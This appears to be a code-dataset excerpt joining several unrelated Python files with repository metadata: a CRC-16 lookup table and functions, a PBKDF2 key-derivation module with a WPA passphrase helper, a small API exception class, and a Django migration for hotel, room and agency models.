0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 )
def calcByte( ch, crc):
"""Given a new Byte and previous CRC, Calc a new CRC-16"""
if type(ch) == type("c"):
by = ord( ch)
else:
by = ch
crc = (crc >> 8) ^ table[(crc ^ by) & 0xFF]
return (crc & 0xFFFF)
def calcString( st, crc):
"""Given a binary string and starting CRC, Calc a final CRC-16 """
for ch in st:
crc = (crc >> 8) ^ table[(crc ^ ch) & 0xFF]
return crc
# end file
| [
"dariusz.pazderski@put.poznan.pl"
] | dariusz.pazderski@put.poznan.pl |
e89d6dc70ef70ba87520aa3295eb41f07cb4aaa9 | 2a3606551a4d850a7b4d6a4e08089c51108ef7be | /plugin.video.mrknow/resources/lib/crypto/keyedHash/pbkdf2.py | cf79523b747c13cbeb4fb110e54813a48c123a41 | [
"Apache-2.0"
] | permissive | rrosajp/filmkodi | a6bb1823f4ed45453c8b8e54ffbd6a7b49f44450 | 0162cde9ae25ddbf4a69330948714833ff2f78c9 | refs/heads/master | 2021-09-18T06:03:17.561062 | 2018-06-22T23:28:53 | 2018-06-22T23:28:53 | 234,768,781 | 1 | 0 | Apache-2.0 | 2021-06-03T20:33:07 | 2020-01-18T17:11:57 | null | WINDOWS-1252 | Python | false | false | 1,571 | py | # -*- coding: iso-8859-1 -*-
""" crypto.keyedHash.pbkdf2
Password Based Key Derivation Function 2
References: RFC2898, B. Kaliski, September 2000, PKCS #5
This function is used for IEEE 802.11/WPA passphrase to key hashing
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
"""
from ..keyedHash.hmacHash import HMAC_SHA1
from ..common import xor
from math import ceil
from struct import pack
def pbkdf2(password, salt, iterations, keySize, PRF=HMAC_SHA1):
""" Create key of size keySize from password and salt """
if len(password)>63:
raise 'Password too long for pbkdf2'
#if len(password)<8 : raise 'Password too short for pbkdf2'
if (keySize > 10000): # spec says >4294967295L*digestSize
raise 'keySize too long for PBKDF2'
prf = PRF(key=password) # HMAC_SHA1
numBlocks = int(ceil(1.*keySize/prf.digest_size)) # ceiling function
key = ''
for block in range(1,numBlocks+1):
# Calculate F(P, salt, iterations, i)
F = prf(salt+pack('>i',block)) # i is packed into 4 big-endian bytes
U = prf(salt+pack('>i',block)) # i is packed into 4 big-endian bytes
for count in range(2,iterations+1):
U = prf(U)
F = xor(F,U)
key = key + F
return key[:keySize]
def dot11PassPhraseToPSK(passPhrase,ssid):
""" The 802.11 TGi recommended pass-phrase-to-preshared-key mapping.
This function simply uses pbkdf2 with interations=4096 and keySize=32
"""
assert( 7<len(passPhrase)<64 ), 'Passphrase must be greater than 7 or less than 64 characters'
return pbkdf2(passPhrase, ssid, iterations=4096, keySize=32)
| [
"mrknow@interia.pl"
] | mrknow@interia.pl |
6d5294bd220daf2939a8aa6af9e29395f72721da | 72c02a60f2a2894a148f5fb4c8ff62e0b0a7fc4e | /news_system/exception.py | 848ec9f9f4ef5f637e6ed55002df3f683d459caf | [] | no_license | Kamonnny/news_system | a798c258dc84efb9756889e2c9eace9b1216c5b3 | 476b4fc0eec8ecb7349cc5e44df990a629c600e4 | refs/heads/main | 2023-03-29T11:46:36.089419 | 2021-03-25T12:45:19 | 2021-03-25T12:45:19 | 314,820,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | class APIError(Exception):
""" 自定义错误类 """
def __init__(self, code: int = 400, msg: str = "ok", data: dict = None):
self.code = code
self.msg = msg
self.data = data or {}
| [
"EachinChung@gmail.com"
] | EachinChung@gmail.com |
5589f53032b5d4e17f0d40bc8a5c208b3fe36000 | 2fd46266ea2a0155d9de4e539970cf7fcdcdfc69 | /backhotel/migrations/0001_initial.py | c8c3e482f97eec20dc732a9c24929f5b19fa4b40 | [] | no_license | djcors/ultragroup | c31307cc7786838c0f016d06c4799b9c822026ef | 0c05014dd7702a99861b7b341883231b627c04d7 | refs/heads/master | 2023-01-13T23:17:49.642271 | 2019-11-13T03:29:58 | 2019-11-13T03:29:58 | 220,570,849 | 0 | 0 | null | 2023-01-07T11:34:22 | 2019-11-09T00:50:13 | JavaScript | UTF-8 | Python | false | false | 2,876 | py | # Generated by Django 2.2.7 on 2019-11-10 15:54
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='AgencyModel',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'AgencyModel',
'verbose_name_plural': 'AgencyModels',
},
bases=('auth.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='HotelModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=100, verbose_name='name')),
('active', models.BooleanField(default=True)),
('code', models.CharField(max_length=30, verbose_name='code')),
('category', models.PositiveSmallIntegerField(default=3, verbose_name='category')),
('agency', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='agency_hoteles', to='backhotel.AgencyModel')),
],
options={
'verbose_name': 'HotelModel',
'verbose_name_plural': 'HotelModels',
},
),
migrations.CreateModel(
name='RoomModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=100, verbose_name='name')),
('active', models.BooleanField(default=True)),
('code', models.CharField(max_length=30, verbose_name='code')),
('room_type', models.CharField(max_length=50, verbose_name='type')),
('base_price', models.PositiveIntegerField(verbose_name='price')),
('tax', models.PositiveIntegerField(verbose_name='% tax')),
('location', models.CharField(max_length=250, verbose_name='location')),
('hotel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hotel_rooms', to='backhotel.HotelModel')),
],
options={
'verbose_name': 'RoomModel',
'verbose_name_plural': 'RoomModels',
},
),
]
| [
"jonathan.cortes@inmersa.co"
] | jonathan.cortes@inmersa.co |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.